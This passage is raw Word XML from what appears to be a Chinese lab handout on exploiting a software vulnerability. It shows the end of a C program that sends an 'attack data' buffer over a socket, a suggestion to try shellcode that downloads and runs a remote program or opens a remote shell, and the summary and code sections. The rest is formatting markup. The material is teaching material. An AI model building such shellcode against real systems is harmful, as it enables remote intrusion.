        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>发送攻击数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ret = send(sc, buf, 2000, 0);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>closesocket(sc);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>WSACleanup();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return 0;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验进阶</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以尝试更为复杂的ShellCode，完成高级功能，比如：远程连接目标IP下载程序并执行或者</w:t>
      </w:r>
      <w:r>
        <w:t>实现远程连接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>hell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本次试验中，要求给出自己漏洞寻找与分析的体会。包括难点，关键技术以及遇到的问题解决方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据课堂讲解内容给出C语言相关代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>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4DC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A3A4DC4"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="750" w:hanging="51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26EF69E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26EF69E9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>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320"/>
        </w:tabs>
        <w:ind w:left="1320" w:hanging="42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
    <w:nsid w:val="3CFE2340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CFE2340"/>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
    <w:nsid w:val="7D811A3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D811A3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25A9C"/>
    <w:rsid w:val="33F2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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>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pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">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style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="9">
    <w:name w:val="样式 Courier New"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="3"/>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2021-05-12T04:57:00Z</dcterms:created>
  <dc:creator>木子</dc:creator>
  <cp:lastModifiedBy>木子</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-12T04:57:49Z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